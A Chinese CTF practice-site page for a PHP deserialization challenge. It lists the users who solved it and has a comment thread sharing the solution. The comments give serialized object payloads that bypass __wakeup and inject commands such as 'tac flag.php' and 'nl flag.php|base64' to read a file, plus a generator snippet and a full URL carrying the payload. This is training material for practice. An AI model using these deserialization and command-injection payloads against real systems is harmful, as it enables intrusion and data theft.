评分(3)
解题动态

hanfugui 攻破了该题 14小时前

13787026747 攻破了该题 19小时前

HelloWorId 攻破了该题 1天前

czg9000 攻破了该题 2天前

breeze153 攻破了该题 5天前

mps11 攻破了该题 5天前

yhyyhy 攻破了该题 8天前

mushmush 攻破了该题 8天前

燃燃然燃 攻破了该题 10天前

18244339938 攻破了该题 12天前

huaji48254 攻破了该题 19天前

tolobuick 攻破了该题 23天前

tfios 攻破了该题 24天前

无122 攻破了该题 25天前

z723622533 攻破了该题 29天前

土豆班长 攻破了该题 1月前

854396873 攻破了该题 1月前

18283162726 攻破了该题 1月前

PDXX 攻破了该题 1月前

评论
tfios 24天前
举报
环境变量里边也有 FLAG
LLTVLL 5月前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 10月前
举报
有哪里提示了username是admin的吗
numberone 8月前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 11月前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 1年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 1年前
举报
nl flag.php|base64
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 1年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 1年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}